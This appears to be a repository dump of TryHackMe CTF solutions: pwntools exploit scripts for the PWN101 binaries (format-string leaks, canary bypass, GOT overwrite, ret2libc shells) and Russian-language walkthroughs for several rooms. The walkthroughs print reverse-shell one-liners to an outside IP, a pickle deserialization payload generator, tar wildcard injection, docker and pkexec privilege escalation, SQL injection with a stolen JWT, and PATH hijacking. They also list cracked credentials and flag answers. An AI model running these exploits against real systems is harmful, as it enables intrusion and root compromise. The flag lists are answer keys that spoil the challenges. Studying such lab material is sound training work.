offset * b'A', 57 | canary, 58 | b'B' * 8, 59 | movaps, 60 | elf.symbols.get_streak 61 | ]) 62 | 63 | io.sendline(payload) 64 | 65 | # Got Shell? 66 | io.interactive() -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn107_local.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Allows you to switch between local/GDB/remote from terminal 4 | def start(argv=[], *a, **kw): 5 | if args.GDB: # Set GDBscript below 6 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 7 | elif args.REMOTE: # ('server', 'port') 8 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 9 | else: # Run locally 10 | return process([exe] + argv, *a, **kw) 11 | 12 | 13 | # Specify GDB script here (breakpoints etc) 14 | gdbscript = ''' 15 | init-pwndbg 16 | piebase 17 | continue 18 | '''.format(**locals()) 19 | 20 | # Binary filename 21 | exe = './pwn107.pwn107' 22 | # This will automatically get context arch, bits, os etc 23 | elf = context.binary = ELF(exe, checksec=False) 24 | # Change logging level to help with debugging (error/warning/info/debug) 25 | context.log_level = 'info' 26 | 27 | # =========================================================== 28 | # EXPLOIT GOES HERE 29 | # =========================================================== 30 | 31 | # Start program 32 | io = start() 33 | 34 | # Leak stack canary address & pie address 35 | stack_leak = '%13$p' 36 | pie_leak = '%17$p' 37 | io.sendlineafter(b':', stack_leak.encode() + b' ' + pie_leak.encode()) 38 | io.recvuntil(b'Your current streak: ') 39 | 40 | # Extract the two addresses from the response 41 | leak = io.recvline().decode().strip().split(' ') 42 | canary = int(leak[0], 16) 43 | leakedpie = int(leak[1], 16) 44 | info("Canary address: %#x", canary) 45 | info("Leaked Pie address: %#x", leakedpie) 46 | 47 | # Calculate pie base address 48 | elf.address = leakedpie - 0x992 49 | info("Piebase address: %#x", elf.address) 50 | 51 | offset = 24 52 | ret = 0x06fe # ret; 53 | movaps = elf.address + ret 54 | 55 | payload = flat([ 56 | offset * b'A', 57 | canary, 58 | b'B' * 8, 59 | movaps, 60 | elf.symbols.get_streak 61 | ]) 62 | 63 | io.sendline(payload) 64 | 65 | # Got Shell? 66 | io.interactive() -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn108.c: -------------------------------------------------------------------------------- 1 | void holidays(void) 2 | 3 | { 4 | long in_FS_OFFSET; 5 | undefined4 local_16; 6 | undefined2 local_12; 7 | long local_10; 8 | 9 | local_10 = *(long *)(in_FS_OFFSET + 0x28); 10 | local_16 = 0x6d617865; 11 | local_12 = 0x73; 12 | printf(&DAT_00402120,&local_16); 13 | system("/bin/sh"); 14 | if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { 15 | /* WARNING: Subroutine does not return */ 16 | __stack_chk_fail(); 17 | } 18 | return; 19 | } 20 | 21 | void main(void) 22 | 23 | { 24 | long in_FS_OFFSET; 25 | undefined name [32]; 26 | char input [104]; 27 | long canary; 28 | 29 | canary = *(long *)(in_FS_OFFSET + 0x28); 30 | setup(); 31 | banner(); 32 | puts(&DAT_00402177); 33 | puts(&DAT_00402198); 34 | printf("\n=[Your name]: "); 35 | read(0,name,0x12); 36 | printf("=[Your Reg No]: "); 37 | read(0,input,100); 38 | puts("\n=[ STUDENT PROFILE ]="); 39 | printf("Name : %s",name); 40 | printf("Register no : "); 41 | printf(input); 42 | printf("Institue : THM"); 43 | puts("\nBranch : B.E (Binary Exploitation)\n"); 44 | puts( 45 | "\n =[ EXAM SCHEDULE ]= \n ------------------------------- -------------------------\n| Date | Exam | FN/AN |\n|------ --------------------------------------------------\n| 1/2/2022 | PROGRAMMING IN ASSEMBLY | FN |\n|--------------------------------------------------------\n| 3/2/2022 | DA TA STRUCTURES | FN |\n|-------------------------------------------------- ------\n| 3/2/2022 | RETURN ORIENTED PROGRAMMING | AN |\n|------------------------- -------------------------------\n| 7/2/2022 | SCRIPTING WITH PYTHON | FN |\n --------------------------------------------------------" 46 | ); 47 | if (canary != *(long *)(in_FS_OFFSET + 0x28)) { 48 | /* WARNING: Subroutine does not return */ 49 | __stack_chk_fail(); 50 | } 51 | return; 52 | } -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn108.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from pwnlib.fmtstr import * 3 | 4 | 5 | # Allows you to switch between local/GDB/remote from terminal 6 | def start(argv=[], *a, **kw): 7 | if args.GDB: # Set GDBscript below 8 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 9 | elif args.REMOTE: # ('server', 'port') 10 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 11 | else: # Run locally 12 | return process([exe] + argv, *a, **kw) 13 | 14 | # Set up pwntools for the correct architecture 15 | exe = './pwn108.pwn108' 16 | # This will automatically get context arch, bits, os etc 17 | elf = context.binary = ELF(exe, checksec=False) 18 | # Enable verbose logging so we can see exactly what is being sent (info/debug) 19 | context.log_level = 'info' 20 | 21 | # =========================================================== 22 | # EXPLOIT GOES HERE 23 | # =========================================================== 24 | 25 | io = start() 26 | 27 | offset = 10 28 | shell = elf.functions['holidays'] 29 | 30 | info('Format string offset %#x', offset) 31 | info('Address to overwrite (elf.got.puts): %#x', elf.got.puts) 32 | info('Address to write func() shell: %#x', 0x000000000040123b) 33 | 34 | # Send payload 35 | io.recvuntil(b'=[Your name]:') 36 | io.sendline(b'Pwner') 37 | io.recvuntil(b'=[Your Reg No]:') 38 | payload = fmtstr_payload(offset, {elf.got.puts: shell}) 39 | io.sendline(payload) 40 | 41 | io.interactive() -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn109.c: -------------------------------------------------------------------------------- 1 | void main(void) 2 | 3 | { 4 | char local_28 [32]; 5 | 6 | setup(); 7 | banner(); 8 | puts(&DAT_00402120); 9 | gets(local_28); 10 | return; 11 | } -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn109.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Allows you to switch between local/GDB/remote from terminal 4 | def start(argv=[], *a, **kw): 5 | if args.GDB: # Set GDBscript below 6 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 7 | elif args.REMOTE: # ('server', 'port') 8 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 9 | else: # Run locally 10 | return process([exe] + argv, *a, **kw) 11 | 12 | 13 | # Specify GDB script here (breakpoints etc) 14 | gdbscript = ''' 15 | init-pwndbg 16 | continue 17 | '''.format(**locals()) 18 | 19 | # Binary filename 20 | exe = './pwn109.pwn109' 21 | # This will automatically get context arch, bits, os etc 22 | elf = context.binary = ELF(exe, checksec=False) 23 | # Change logging level to help with debugging (error/warning/info/debug) 24 | context.log_level = 'info' 25 | 26 | # =========================================================== 27 | # EXPLOIT GOES HERE 28 | # =========================================================== 29 | 30 | libc = elf.libc 31 | 32 | # Start program 33 | io = start() 34 | 35 | offset = 40 36 | pop_rdi = 0x00000000004012a3 # pop rdi; ret; 37 | movaps = 0x000000000040101a # ret; 38 | 39 | # Build payload for puts plt leak address 40 | payload = flat({ 41 | offset: [ 42 | pop_rdi, 43 | elf.got['puts'], 44 | elf.plt['puts'], 45 | elf.symbols['main'] 46 | ] 47 | }) 48 | 49 | io.recvuntil('Go ahead') 50 | io.recvline() 51 | io.sendline(payload) 52 | 53 | # libc addresses are often only 6 bytes long, meaning they are preceded with 0x0000 54 | # but this won't be read as it's a null byte, so only read 6 bytes and append the null ones later 55 | got_puts = u64(io.recv(6) + b'\x00\x00') 56 | info("Puts leaked address %#x", got_puts) 57 | 58 | # Update libc address 59 | libc.address = got_puts - libc.symbols['puts'] 60 | info("Libc address %#x", libc.address) 61 | 62 | system = libc.symbols['puts'] - 0x31550 63 | sh = libc.symbols['puts'] + 0x13337a 64 | info("Libc system address %#x", libc.symbols['system']) 65 | info("Libc /bin/sh address %#x", sh) 66 | 67 | 68 | payload = flat({ 69 | offset: [ 70 | pop_rdi, 71 | sh, 72 | movaps, 73 | system 74 | ] 75 | }) 76 | 77 | # Send the payload 78 | io.sendline(payload) 79 | 80 | io.interactive() -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn109_local.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Allows you to switch between local/GDB/remote from terminal 4 | def start(argv=[], *a, **kw): 5 | if args.GDB: # Set GDBscript below 6 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 7 | elif args.REMOTE: # ('server', 'port') 8 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 9 | else: # Run locally 10 | return process([exe] + argv, *a, **kw) 11 | 12 | 13 | # Specify GDB script here (breakpoints etc) 14 | gdbscript = ''' 15 | init-pwndbg 16 | continue 17 | '''.format(**locals()) 18 | 19 | # Binary filename 20 | exe = './pwn109.pwn109' 21 | # This will automatically get context arch, bits, os etc 22 | elf = context.binary = ELF(exe, checksec=False) 23 | # Change logging level to help with debugging (error/warning/info/debug) 24 | context.log_level = 'info' 25 | 26 | # =========================================================== 27 | # EXPLOIT GOES HERE 28 | # =========================================================== 29 | 30 | libc = elf.libc 31 | 32 | # Start program 33 | io = start() 34 | 35 | offset = 40 36 | pop_rdi = 0x00000000004012a3 # pop rdi; ret; 37 | movaps = 0x000000000040101a # ret; 38 | 39 | # Build payload for puts plt leak address 40 | payload = flat({ 41 | offset: [ 42 | pop_rdi, 43 | elf.got['puts'], 44 | elf.plt['puts'], 45 | elf.symbols['main'] 46 | ] 47 | }) 48 | 49 | io.recvuntil('Go ahead') 50 | io.recvline() 51 | io.sendline(payload) 52 | 53 | # libc addresses are often only 6 bytes long, meaning they are preceded with 0x0000 54 | # but this won't be read as it's a null byte, so only read 6 bytes and append the null ones later 55 | got_puts = u64(io.recv(6) + b'\x00\x00') 56 | info("Puts leaked address %#x", got_puts) 57 | 58 | # Update libc address 59 | libc.address = got_puts - libc.symbols['puts'] 60 | info("Libc address %#x", libc.address) 61 | 62 | # Perform ret2libc 63 | rop = ROP(libc) 64 | sh = next(libc.search(b'/bin/sh')) 65 | system = rop.system(sh) 66 | chain = rop.chain() 67 | info("Libc system address %#x", libc.symbols['system']) 68 | info("Libc /bin/sh address %#x", sh) 69 | 70 | payload = flat({ 71 | offset: [ 72 | movaps, 73 | chain 74 | ] 75 | }) 76 | 77 | # Send the payload 78 | io.sendline(payload) 79 | 80 | io.interactive() -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn110.c: -------------------------------------------------------------------------------- 1 | void main(void) 2 | 3 | { 4 | char buf [32]; 5 | 6 | setup(); 7 | banner(); 8 | puts(&DAT_00495120); 9 | puts(&DAT_00495150); 10 | gets(buf); 11 | return; 12 | } -------------------------------------------------------------------------------- /02.Medium/Peak Hill.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 4 | 5 | # Комната [Peak Hill](https://tryhackme.com/r/room/peakhill) 6 | 7 | Всего 1 заданиe: 8 | ## Задание 1 9 | Разверните и скомпрометируйте машину! 10 | Убедитесь, что вы подключены к сети TryHackMe . 11 | 12 | ### Ответьте на вопросы ниже 13 | Что такое флаг пользователя? 14 | ```commandline 15 | nmap -sSCV -p- 16 | ftp 17 | ls -la 18 | get .creds 19 | get test.txt 20 | lquit 21 | cat test.txt 22 | cat .creds 23 | 24 | cyber chef -> from binary 25 | python3 decode_pickel.py 26 | # SSH user: gherkin 27 | # SSH pass: p1ckl3s_@11_@r0und_th3_w0rld 28 | 29 | ssh gherkin@ 30 | ls -la 31 | cat cmd_service.pyc 32 | 33 | python3 34 | print(long_to_bytes(1684630636)) 35 | print(long_to_bytes(2457564920124666544827225107428488864802762356)) 36 | 37 | nc 7321 38 | # Username: dill 39 | # Password: n3v3r_@_d1ll_m0m3nt 40 | cat /home/dill/user.txt 41 | ``` 42 | ```commandline 43 | f1e13335c47306e193212c98fc07b6a0 44 | ``` 45 | + 50 46 | Что такое корневой флаг? 47 | ```commandline 48 | ssh-keygen -t rsa 49 | cat id_rsa.pub 50 | echo "ssh-rsa ...[REDACTED]...= unknown@localhost.localdomain" >> /home/dill/.ssh/authorized_keys 51 | ssh dill@ 52 | sudo -l 53 | cd /opt/peak_hill_farm 54 | sudo ./peak_hill_farm 55 | pickles 56 | 57 | python3 58 | import sys 59 | import pickle 60 | import base64 61 | import os 62 | 63 | cmd = sys.argv[1] 64 | 65 | class Exec(object): 66 | def __reduce__(self): 67 | return (eval("os.system"), (cmd,)) 68 | 69 | print(f"os.system(\"{cmd}\")") 70 | print() 71 | print(base64.b64encode(pickle.dumps(Exec())).decode()) 72 | 73 | 74 | sudo ./peak_hill_farm 75 | gANjcG9zaXgKc3lzdGVtCnEAWAkAAAAvYmluL2Jhc2hxAYVxAlJxAy4= 76 | 77 | cat /root/root.txt 78 | ``` 79 | ```commandline 80 | e88f0a01135c05cf0912cf4bc335ee28 81 | ``` 82 | 83 | 84 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Profiles.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Profiles](https://tryhackme.com/r/room/profilesroom) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Группа реагирования на инциденты предупредила вас о подозрительной активности на одном из серверов баз данных Linux. 8 | 9 | Был сделан дамп памяти сервера, который был предоставлен вам для анализа. Вы сообщаете команде, что вам не хватает 10 | важной информации с сервера, но он уже отключен. Они просто немного усложнили вашу работу, но не сделали ее 11 | невозможной. 12 | 13 | Нажмите кнопку Download Task Files в верхней части этого задания. Вам будет предоставлен файл доказательства .zip. 14 | 15 | Извлеките содержимое zip-файла и начните анализ, чтобы ответить на вопросы. 16 | Примечание: лучше всего выполнить задачу, используя собственную среду. Я рекомендую использовать Volatility 2.6.1 17 | для решения этой задачи и настоятельно рекомендую использовать эту статью Шона Уэйлена, которая поможет вам с 18 | установкой Volatility. 19 | 20 | ### Ответьте на вопросы ниже 21 | Какой пароль root раскрыт? 22 | 23 | Volatility — это инструмент командной строки, который позволяет группам цифровой криминалистики и реагирования на 24 | инциденты анализировать дамп памяти для выполнения анализа памяти. 25 | 26 | Volatility написан на Python и может анализировать снимки, сделанные в Linux, Mac OS и Windows. 27 | 28 | Волатильность имеет широкий спектр применения, включая следующие: 29 | - Список всех активных и закрытых сетевых подключений. 30 | - Список запущенных процессов устройства на момент захвата. 31 | - Список возможных значений истории командной строки. 32 | - Извлечение возможных вредоносных процессов для дальнейшего анализа. 33 | И этот список можно продолжать. 34 | 35 | https://github.com/volatilityfoundation/volatility 36 | 37 | 38 | 39 | ```commandline 40 | Ftrccw45PHyq 41 | ``` 42 | И в какое время примерно был доступ к файлу users.db? Формат ГГГГ-ММ-ДД ЧЧ:ММ:СС 43 | ```commandline 44 | 2023-11-07 03:49:45 45 | ``` 46 | Каков MD5-хеш найденного вредоносного файла? 47 | ```commandline 48 | 0511ccaad402d6d13ce801e1e9136ba2 49 | ``` 50 | Какой IP-адрес и порт у злоумышленника? Формат IP:Port 51 | ```commandline 52 | 10.0.2.72:1337 53 | ``` 54 | Какой полный путь к файлу cronjob и его номер inode? Формат: имя_файла: номер inode 55 | ```commandline 56 | /var/spool/cron/crontabs/root:131127 57 | ``` 58 | Какая команда находится внутри файла cronjob? 59 | ```commandline 60 | * * * * * cp /opt/.bashrc /root/.bashrc 61 | ``` 62 | 63 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Recovery.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Recovery](https://tryhackme.com/r/room/recovery) 4 | 5 | Всего 5 заданий: 6 | ## Задание 1 7 | Привет, это я, твой друг Алекс. 8 | 9 | Я не собираюсь ходить вокруг да около; мне нужна ваша помощь. Как вы знаете, я работаю в компании Recoverysoft. Я 10 | работаю над веб-сайтом и настраиваю веб-сервер Ubuntu для его работы. Вчера один из моих коллег по работе прислал 11 | мне следующее письмо: 12 | 13 | Hi Alex, 14 | A recent security vulnerability has been discovered that affects the web server. Could you please run this binary on 15 | the server to implement the fix? 16 | Regards 17 | - Teo 18 | 19 | Прикрепленный файл linux под названием fixutil. Как и было сказано, я запустил файл, и все было хорошо. Но сегодня 20 | утром я попытался войти на сервер через SSH и получил следующее сообщение: 21 | 22 | ТЫ НЕ СКАЗАЛ ВОЛШЕБНОЕ СЛОВО! 23 | ТЫ НЕ СКАЗАЛ ВОЛШЕБНОЕ СЛОВО! 24 | ТЫ НЕ СКАЗАЛ ВОЛШЕБНОЕ СЛОВО! 25 | 26 | 27 | Оказывается, почтовый аккаунт Тео взломали, а fixutil был вредоносным двоичным файлом, специально созданным для 28 | уничтожения моего веб-сервера! 29 | 30 | когда я открыл сайт в своем браузере, я получил какую-то сумасшедшую чушь. Файлы веб-сервера были зашифрованы! 31 | Прежде чем вы спросите, у меня нет никаких других резервных копий веб-сервера (я знаю, я знаю, ужасная практика и т. 32 | д.), я не хочу говорить своему боссу, он меня точно уволит. 33 | 34 | Пожалуйста, зайдите на веб-сервер и исправьте все повреждения, вызванные fixutil. Вы можете найти двоичный файл в 35 | моем домашнем каталоге. Вот мои учетные данные ssh: 36 | 37 | Username: alex 38 | Password: madeline 39 | 40 | Я настроил панель управления для отслеживания вашего прогресса на порту 1337. Доступ к ней осуществляется через 41 | веб-браузер. По мере устранения повреждений вы можете обновить страницу, чтобы получить те самые «флаги», которые, я 42 | знаю, вы любите копить. 43 | 44 | Удачи! 45 | - Твой друг Алекс 46 | 47 | ### Ответьте на вопросы ниже 48 | Флаг 0 49 | ```commandline 50 | THM{d8b5c89061ed767547a782e0f9b0b0fe} 51 | ``` 52 | Флаг 1 53 | ```commandline 54 | THM{4c3e355694574cb182ca3057a685509d} 55 | ``` 56 | Флаг 2 57 | ```commandline 58 | THM{72f8fe5fd968b5817f67acecdc701e52} 59 | ``` 60 | Флаг 3 61 | ```commandline 62 | THM{70f7de17bb4e08686977a061205f3bf0} 63 | ``` 64 | Флаг 4 65 | ```commandline 66 | THM{b0757f8fb8fe8dac584e80c6ac151d7d} 67 | ``` 68 | Флаг 5 69 | ```commandline 70 | THM{088a36245afc7cb935f19f030c4c28b2} 71 | ``` 72 | 73 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Road.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Road](https://tryhackme.com/r/room/road) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Как обычно, получите флаг пользователя и root. 8 | 9 | ### Ответьте на вопросы ниже 10 | Что такое флаг user.txt? 11 | ```commandline 12 | nmap -sSCV -p- 13 | # shell.php 14 | nc -lvnp 4444 15 | find / -name "user.txt" 2>dev/null 16 | cat /home/webdeveloper/user.txt 17 | ``` 18 | ```commandline 19 | 63191e4ece37523c9fe6bb62a5364d45 20 | ``` 21 | Что такое флаг root.txt? 22 | ```commandline 23 | getent passw 24 | ss -tulnp 25 | mongo 26 | show dbs 27 | use backup 28 | show collections; 29 | db.user.find(); 30 | su webdeveloper 31 | sudo -l 32 | find / -perm -u=s 2>/dev/null 33 | echo $$ 34 | pkttyagent --process 35 | pkexec "/bin/bash" 36 | cat /root/root.txt 37 | ``` 38 | ```commandline 39 | 3a62d897c40a815ecbe267df2f533ac6 40 | ``` 41 | 42 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/The Marketplace.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [The Marketplace](https://tryhackme.com/r/room/marketplace) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Системный администратор The Marketplace, Майкл, предоставил вам доступ к своему внутреннему серверу, чтобы вы могли 8 | провести пентест платформы Marketplace, над которой он и его команда работали. Он сказал, что в ней все еще есть 9 | несколько ошибок, которые ему и его команде нужно исправить. 10 | 11 | Можете ли вы воспользоваться этим и сможете ли вы получить root-доступ на его сервере? 12 | 13 | ### Ответьте на вопросы ниже 14 | Что такое флаг 1? 15 | ```commandline 16 | nmap -sSCV -p- 17 | 18 | 19 | cat > grabber.php << EOF 20 | 26 | EOF 27 | 28 | nc -nlvp 8000 29 | GET /grabber.php?c=token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjE2NzQ1NjN9.SZDjFMO2_KIMpIoLWuD5Zt3fKggTM8AoTS7plL32uig HTTP/1.1 30 | GET /admin HTTP/1.1 31 | ``` 32 | ```commandline 33 | THM{c37a63895910e478f28669b048c348d5} 34 | ``` 35 | Что такое флаг 2? (User.txt) 36 | ```commandline 37 | curl -s --cookie "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjE2NzQ1NjN9.SZDjFMO2_KIMpIoLWuD5Zt3fKggTM8AoTS7plL32uig" \ 38 | http:///admin?user=`urlencode "0 UNION SELECT 1,GROUP_CONCAT(message_content),3,4 FROM marketplace.messages"` | tail cat user.txt 39 | ``` 40 | ```commandline 41 | THM{c3648ee7af1369676e3e4b15da6dc0b4} 42 | ``` 43 | Что такое флаг 3? (Root.txt) 44 | ```commandline 45 | id michael 46 | find / -type f -user michael -exec ls -l {} + 2>/dev/null 47 | cat /opt/backups/backup.sh 48 | #!/bin/bash 49 | echo "Backing up files..."; 50 | tar cf /opt/backups/backup.tar * 51 | 52 | sudo -l 53 | cat > /opt/backups/shell.sh << EOF 54 | #!/bin/bash 55 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.50.72 4444 >/tmp/f 56 | EOF 57 | 58 | chmod +x /opt/backups/shell.sh 59 | touch "/opt/backups/--checkpoint=1" 60 | touch "/opt/backups/--checkpoint-action=exec=sh shell.sh" 61 | cd /opt/backups/ 62 | sudo -u michael /opt/backups/backup.sh 63 | 64 | nc -nlvp 4444 65 | id 66 | docker image ls 67 | python3 -c "import pty;pty.spawn('/bin/bash')" 68 | docker run -v /:/mnt --rm -it alpine chroot /mnt sh 69 | id 70 | cat /root/root.txt 71 | ``` 72 | ```commandline 73 | THM{d4f76179c80c0dcf46e0f8e43c9abd62} 74 | ``` 75 | 76 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/The Server From Hell.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [The Server From Hell](https://tryhackme.com/r/room/theserverfromhell) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Начните с порта 1337 и продолжайте нумерацию. 8 | Удачи. 9 | 10 | ### Ответьте на вопросы ниже 11 | флаг.txt 12 | ```commandline 13 | nc 1337 14 | for i in {1..100};do nc $i;echo "";done 15 | nc 12345 16 | nmap -sC -sV -p111,2049 17 | mkdir nfs 18 | sudo mount -t nfs : nfs 19 | tree nfs 20 | zipinfo backup.zip 21 | zip2john backup.zip > backup.hash 22 | john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt 23 | cat flag.txt 24 | ``` 25 | ```commandline 26 | thm{h0p3_y0u_l1k3d_th3_f1r3w4ll} 27 | ``` 28 | пользователь.txt 29 | ```commandline 30 | cat hint.txt 31 | nmap -sV -p 2500-4500 | grep -i ssh 32 | chmod 600 id_rsa 33 | ssh -i id_rsa hades@ -p 3333 34 | exec '/bin/bash' 35 | cat user.txt 36 | ``` 37 | ```commandline 38 | thm{sh3ll_3c4p3_15_v3ry_1337} 39 | ``` 40 | корень.txt 41 | ```commandline 42 | getcap -r / 2>/dev/null 43 | tar -cvf flag.tar /root/root.txt 44 | tar xf flag.tar 45 | cat root/root.txt 46 | ``` 47 | ```commandline 48 | thm{w0w_n1c3_3sc4l4t10n} 49 | ``` 50 | 51 | 52 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/VulnNet.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [VulnNet](https://tryhackme.com/r/room/vulnnet1) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Цель этого задания — использовать более реалистичные приемы и объединить их в одном устройстве для отработки навыков. 8 | 9 | Уровень сложности: средний 10 | Язык веб-сайта: PHP => Вам придется добавить IP-адрес машины с доменом vulnnet.thm в ваш `/etc/hosts` 11 | 12 | Иконка сделана пользователем monkik с сайта www.flaticon.com 13 | 14 | ### Ответьте на вопросы ниже 15 | Что такое флаг пользователя? (user.txt) 16 | ```commandline 17 | echo " vulnnet.thm" | sudo tee -a /etc/hosts 18 | nmap -sSCV vulnnet.thm 19 | echo " broadcast.vulnnet.thm" | sudo tee -a /etc/hosts 20 | curl -s http://vulnnet.thm/?referer=/etc/passwd 21 | curl -s http://vulnnet.thm/?referer=/etc/apache2/sites-enabled/000-default.conf 22 | curl -s http://vulnnet.thm/?referer=/etc/apache2/.htpasswd 23 | # developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0 24 | john auth.hash --wordlist=/usr/share/wordlists/rockyou.txt 25 | # developers:9972761drmfsls 26 | searchsploit clipbucket 4.0 27 | curl -F "file=@rev.php" -F "plupload=1" -F "name=rev.php" "http://developers:9972761drmfsls@broadcast.vulnnet.thm/actions/beats_uploader.php" 28 | nc -nlvp 4444 29 | find / -type f -user server-management -exec ls -l {} + 2>/dev/null 30 | ssh2john.py id_rsa > ssh.hash 31 | john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt 32 | # id_rsa:oneTWO3gOyac 33 | ssh -i id_rsa server-management@vulnnet.thm 34 | cat user.txt 35 | ``` 36 | ```commandline 37 | THM{907e420d979d8e2992f3d7e16bee1e8b} 38 | ``` 39 | Что такое корневой флаг? (root.txt) 40 | ```commandline 41 | cat /etc/crontab 42 | cd /var/opt/ 43 | ls -la 44 | echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f" > /home/server-management/Documents/rev.sh 45 | touch "/home/server-management/Documents/--checkpoint=1" 46 | touch "/home/server-management/Documents/--checkpoint-action=exec=sh rev.sh" 47 | nc -nlvp 4444 48 | cat /root/root.txt 49 | ``` 50 | ```commandline 51 | THM{220b671dd8adc301b34c2738ee8295ba} 52 | ``` 53 | 54 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Wekor.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Wekor](https://tryhackme.com/r/room/wekorra) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Привет всем! Эта коробка — просто небольшой CTF, который я недавно подготовил. Надеюсь, вам понравится, так как я 8 | впервые создаю что-то подобное! 9 | 10 | Данный CTF в первую очередь ориентирован на перечисление, лучшее понимание сервисов и нестандартное мышление для 11 | некоторых частей этой машины. 12 | 13 | Не стесняйтесь задавать любые вопросы... Ничего страшного, если в некоторых частях коробки вы запутаетесь ;) 14 | 15 | Небольшое примечание: пожалуйста, используйте домен: "wekor.thm", так как он может пригодиться позже в поле ;) 16 | 17 | ### Ответьте на вопросы ниже 18 | Разверните Машину! 19 | ```commandline 20 | Ответ не нужен 21 | ``` 22 | 23 | ## Задание 2 24 | Время отправлять флаги :) 25 | ### Ответьте на вопросы ниже 26 | Что такое флаг пользователя? 27 | ```commandline 28 | echo " wekor.thm" | sudo tee -a /etc/hosts 29 | for i in `curl -s http://wekor.thm/robots.txt | grep Disallow | cut -d " " -f2`;do echo $i;curl -I http://wekor.thm$i;echo "---";done 30 | curl -s http://wekor.thm/comingreallysoon/ 31 | sqlmap -r it_cart_coupon.xml --dump-all --threads=10 32 | ll 33 | tree wordpress 34 | cat wp_users.csv 35 | john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 36 | echo " site.wekor.thm" | sudo tee -a /etc/hosts 37 | admin: Administrator 38 | wp_eagle: Subscriber 39 | wp_jeffrey: Subscriber 40 | wp_yura: Administrator 41 | 42 | nc -nlvp 4444 43 | echo "stats items" | nc -vn -w 1 127.0.0.1 11211 44 | echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211 45 | echo "get username" | nc -vn -w 1 127.0.0.1 11211 46 | echo "get password" | nc -vn -w 1 127.0.0.1 11211 47 | Orka:OrkAiSC00L24/7$ 48 | su Orka 49 | Password: OrkAiSC00L24/7$ 50 | cat /home/Orka/user.txt 51 | ``` 52 | ```commandline 53 | 1a26a6d51c0172400add0e297608dec6 54 | ``` 55 | Что такое корневой флаг? 56 | ```commandline 57 | sudo -l 58 | ./bitcoin 59 | echo $PATH 60 | ls -la /usr/sbin/ | head 61 | cat > /usr/sbin/python << EOF 62 | #!/bin/bash 63 | /bin/bash 64 | EOF 65 | 66 | chmod +x /usr/sbin/python 67 | sudo /home/Orka/Desktop/bitcoin 68 | 20 69 | cat /root/root.txt 70 | ``` 71 | ```commandline 72 | 